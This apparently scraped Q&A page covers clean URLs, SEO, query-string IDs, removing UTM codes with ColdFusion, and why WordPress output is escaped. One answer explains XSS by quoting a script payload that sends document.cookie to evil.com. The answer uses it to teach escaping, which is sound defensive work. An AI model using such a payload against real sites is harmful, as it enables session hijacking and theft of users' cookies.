Concrete 5 search results page url - concrete5

Concrete 5 search results page url contains some parameters. how to remove that parameters and make the url user friendly

On an apache server I recommend you to use the mod_rewrite module to use the RewriteEngine.
With this module you can specify aliases for some internal URLs (of course with parameters as well). You can also use RegEx for this.
RewriteEngine on Wikipedia
mod_rewrite tutorial

Short answer: it's probably not worth the trouble.
Long answer...
I'm guessing you see three query parameters when using the search block:
query
search_paths[]
submit
The first parameter is required to make the searches work, but the other two can be dropped. When I build concrete5 themes, I usually "hard-code" the html for the search form, so that I can control which parameters are sent (basically, don't provide a "name" to the submit button, and don't include a "search_paths" hidden field).
The "query" parameter, though, is not going to be easy to get rid of. The problem is that for a search, you're supposed to have a parameter like that in the URL. You could work around this by using javascript -- when the search form is submitted, use some jquery to rewrite the request so it puts that parameter at the end of the URL (for example, http://example.com/search?query=test becomes http://example.com/search/test). Then, as #tuxtimo suggests, you add a rewrite rule to your .htaccess file to take that last piece of the URL and treat it as the ?query parameter that the system expects. But this won't work if the user doesn't have javascript enabled (and hence probably not for Googlebot either, which means that this won't really serve you any SEO purpose -- which I further imagine is the real reason you're asking this question to begin with).
Also, you will run into a lot of trouble if you ever add another page under the page that you show the search results on (because you have the rewrite rule that treats everything after the top-level search page path as a search parameter -- so you can never actually reach an address that exists below that path).
So I'd just make a nice clean search form that only sends the ?query parameter and leave it at that -- I don't think those are really that much less user-friendly than /search-term would be.

Related

Is there a preferred canonical form for the path part of URLs?

All of these URLs are equivalent:
http://rbutterworth.nfshost.com/Me
http://rbutterworth.nfshost.com/Me/
http://rbutterworth.nfshost.com/Me/.
http://rbutterworth.nfshost.com/Me/index
http://rbutterworth.nfshost.com/Me/index.html
The "rel='canonical'" link allows me to specifiy whichever I want.
Is one of those forms considered "better" or "more standard" than the others?
As a maintainer, I personally prefer the first one, as it allows me the freedom to change "Me" to be "Me.php", or change "index.html" to be "index.shtml", or some other form should I ever need to, without having to define redirects, or to change any existing links to this URL. (This isn't specific to "index"; it could be for any web page.)
I.e. using that simplest form avoids publishing what is only an implementation detail that is best hidden from the users.
Unfortunately, of all the forms, my preferred choice is the only one that web servers don't like; they return "HTTP/1.1 301 Moved Permanently" and add the trailing "/".
For directories, is incurring this redirection penalty worth it?
For non-directories, is there any reason I shouldn't continue omitting the suffix?
Added after receiving the answer:
It's nice to know I'm not the only one that thinks omitting suffixes is a good idea.
And I just realized that my problem with directories goes away if I use "directoryname/index" as the canonical form.
Thanks.
For directories, is incurring this redirection penalty worth it?
No.
"The canonical URL for this resource is a 301 redirect to another URL" doesn't make sense.
For non-directories, is there any reason I shouldn't continue omitting the suffix?
No.
There is a reason to omit the suffix: It leaks information about the technologies used to built the site, and makes it harder to change them (i.e. if you moved away from static HTML files to a PHP based system, then you'd need to redirect all your old URLs … or configure your server to process files with a .html extension as PHP (which is possible, but confusing).

How to check if any URLs within my website contain specific Google Analytics UTM codes?

The website I manage uses Google Analytics to track URLs. Recently I found out that some of the URLs contain UTM codes and should not. I need some way of determining whether or not URLs that contain the following UTM codes utm_source=redirect or utm_source=redirectfolder are currently on the website and being redirected within the same website. If so, I will need to remove the UTM codes on those URLs, because Google Analytics automatically tracks URLs that redirect within the same domain. So it does not require UTM codes (and this actually hurts the analytics).
My apologies if I sound a little broken here, I am still trying to understand it all myself, as I am a new graduate with a CS degree and I am now the only web developer. I am not asking for anyone to write this for me, just if I could be pointed in the right direction to writing a ColdFusion script that may help with this.
So if I understand correctly your codebase is riddled with problematic URLS. To clean up the URLs programmatically you'll need to do a couple of things up front.
Identify the querystring parameter variable/value pair that needs to be
eliminated.
Create a worker file to access all your .cfm and .cfc files (of interest).
Create a loop that goes through the directories and reads, edits and saves your files (be careful here not to go crazy, maybe do not set to overwrite existing files (like make unique, unless you are sure).
Create a find/replace function or regex expression to target and remove your troublesome parameters
Save your file and move on in the loop.
OR:
You can use and IDE like dreamweaver or sublimetext to locate these via a regex search and spot check and remove.
I would selectively remove the URL parameters, but if you have so many pages that it makes no sense, then programmatic removal would be the way to go.
You will be using cfdirectory, cffile, rematch() (and create an array and rebuild) or find/replace replaceNoCase()
Your cfdirectory call will return a variable and like a query you will spin through it like you do with a normal query and cfoutput.
Pull one or two files out of your repo to create your code with until you are confortable. I would code in exit strategies (fail gracefully) like adding a locatable comments to the change spot so you can check it later manually, or escape out if a file won't write and many other try/catch opportunities.
I hope this helps.

Why must I escape data prior to rendering it for the end user in WordPress?

I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
http://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data#Escaping:_Securing_Output
Because if you do not you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript, if you do not escape, user set JavaScript could be output to the page and executed (rather than simply displayed as it does on StackOverflow).
e.g. if incoming data is saved into your database, it may still contain JavaScript code within the HTML. e.g. <script>document.location="evil.com?" + escape(document.cookie)</script>
This would have the effect of redirecting whichever user views the page to www.evil.com, passing all cookies (which could include the session ID of the user, compromising the user's session via session hijacking). However, this is often done in a more subtle fashion so the user is not being aware that they are being attacked, like setting a URL of an <img> tag to pass along the cookies, or even embed a keylogger within the page.
Escaping needs to be done per output context, so it must be done when output rather than when input. Examples of output context are HTML, JavaScript, and CSS and they all have their own escaping (encoding) rules that must be followed to ensure your output is safe. e.g. & in HTML is & whilst in JavaScript it should be encoded as \x26. This will ensure the character is correctly interpreted by the language as the literal rather than as a control character.
Please see the OWASP XSS Prevention Cheat Sheet for more details.
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps insure you're not letting someone inject anything unwanted into your page.
It's not as huge of a risk as forgetting input validation (well okay maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross site scripting. This article does a nice job giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/

Is static URL better than dynamic URL in terms of SERP?

I've been reading up on SEO and how to construct my links in terms of getting better SERP.
I'm using WordPress as the framework for my site and have custom templates retrieving data from my DB.
What makes a URL dynamic, is the usage of ? and &. Nothing more, nothing less. Google recommends that I should not have too many attributes in my URL - and that's understandable.
Dynamic: www.mysite.com/?id=123&name=some+store+name&city=london
Static: www.mysite.com/london/some+store+name/123
Q1: I don't feel that adding the store ID in this static URL looks nice. But I do need it in order to fetch data from the DB, right?
Reading various blogs, I see many SEO (experts) saying different things, but I feel most of it is just talk without actually proving their statements. We can all agree that static URLs are good in terms of usability (and readability).
Q2: But many claim that static URLs prevent duplicate content. I don't agree on that as all my contents have unique ID. Can anyone comment on this?
Q3: In the end, for the Google search engine (and others) it really doesn't matter if the URL is static or dynamic. But since Google is working towards user friendly content, is that the only argument for having static URLs?
1) There's no problem using DB ids alongside static URLs. Many huge e-commerce and other commercial sites do this (Amazon, eBay... hell, everyone really.)
2) A static URL in and of itself does not prevent duplicate content. There are hundreds of ways duplicates can happen (child pages, external copy, javascript, form fields, ajax, archive sections... the list foes on.)
3) It doesn't matter if it's static or dynamic for indexing. But in terms of ranking well, static URLs with informative (and relevant to the targeted keywords) searches are hugely beneficial. Multivariate testing I've done shows users are also generally re-assured by clean looking URLs in terms of usability.
If you give me some more examples, I can probably help out a bit more.
Urls without parameters are always better. It won't absolutely kill SEO - but it is better not to have them.
!0 years ago Google would ignore parameters and would penalize you for URLs with parameters. Today they are really good at figuring out these db parameters - but not perfect. Among other things Google has to try to figure out which URL parameters matter, and which don't and if parameter order matters.
E.g. you may have URL parameters that store user preferences, navigation state etc. This will just proliferate URLs that Google has to try to decode. So what you should do is:
Right before generating an URL at least sort your parameters.
Convert parameters that matter into things that don't look like parameters. So if I had a shoe store with a urls like http://mystore.com/mypage?category=boots&brand=great&color=red I'd rewrite that to something like http://mystore.com/mypage/category/boots/brand/great/color/red or even better:
http://myscore.com/mypage/boots/great/red
Then you can add the parameters that don't matter for the page content at the end. Google will figure out they don't matter.
The other reason to fix your URLs is that Goolge displays them to users in the SERP, and people are more likely to click on readable URLs than database URLs.
Why do big stores like amazon use database urls? because they are giant, bad urls don't hurt them, and their systems are so large and complex it is the only way to manage it. But for smaller sites with fewer products, readble URLs are achievable and are one of the few advantages a small site can have over a big one.
If anyone observing closely Google SERP results definitely find some part of SERP results are highlighted and bold as well. Now noticing further one can easily find "Search Query" are getting highlighted or bold in "Title" , "Descriptions" and "URL" who are using same "Search Query" in Title, Descriptions and URL as well.
Now thing is if any website URL's are dynamic and coming with parameter ID, they are loosing keywords from Title, Descriptions and URL as well.
Ex:
http://www.johnzaccheofineart.com/catagory-2/?id=4
http://www.johnzaccheofineart.com/painting/johnzaccheo
Sample Search : Painting for Sale
Now easily we can understand difference between static and dynamic URL performance. One URL coming with such word which has no search value, other URL is coming with category name as well as painter name.
So, being a user i will give preference to 2nd one which is understandable from URL itself.

Is it old-fashioned use query string for id?

I am curious if is out-of-date to use query string for id. We have webapp running on Net 2.0. When we display detail of something (can be product) we use query string like this : http://www.somesite.com/Shop/Product/Detail.aspx?ProductId=100
We use query string for reason that user can save the link somewhere and come back any time later. I suppose that we use url rewriting soon or later but in mean time I would like to know your opinion. Thanks.Cheers, X.
A common strategy is to use an item ID in the URL, coupled with some keywords that describe the item. This is good from a user's perspective, because they can easily see what a URL refers to if they save it somewhere. More importantly, it's useful from a SEO (Search Engine Optimisation) point of view, as search engines will - it is said - rate a given URL more highly if it contains the keywords someone is searching for.
You can see this approach on this very site, where the ID after 'questions' is used for the database query and the text is purely for the benefit of users and search engines.
Whether you use a straightforward query string, or a more advanced approach that makes the ID look like part of the folder path, is up to you. It's largely a matter of personal taste.
Yes, it is old fashioned!
However, if you are thinking about changing it to a RESTful implementation as others have suggested, then you should continue to support the old URL and querystring addresses by implementing an HTTP 301 redirect to forward from the querystring URLs, to the new restful URLs. This will ensure that any users old links and bookmarks will continue to work while telling the search engine bots that the url has changed.
Since your post is tagged ASP.Net, there is a good write-up on how you can support both, using the new ASP.Net routing mechanism here: http://msdn.microsoft.com/en-us/magazine/dd347546.aspx
Nothing wrong with query string parameters. Simple to create and understand. A lot of sites are using fancy urls like 'www.somesite.com/Shop/Product/white_sox_t_shirt` which is cool and sort-of user friendly, but more work for us poor developers.
Using query strings is not outdated at all, it just has to be used in the right places. However, never place anything in the query string that could be a security issue and remember that anything you read from the query string could have been modified so you should be validating all input in your checks.
It's not outdated, but anothter alternative is a more RESTful approach:
yourwebsite.com/products/100/usb-coffee-maker
The reason is that a) search engines usually ignore any URL with a QueryString (so the product.aspx?id=100 page may never get indexed) and b) having the name in the url purely for display purposes supposedly helps SEO as well.
Permanent links are best for SEO and also , what if your product moved to another database , and the ID of the product needs to be changed ?
I don't think the chances of a product's name will be changed or the manufacturer.
E.g Apple/Iphone won't change :) Seems to me a good Permalink

Resources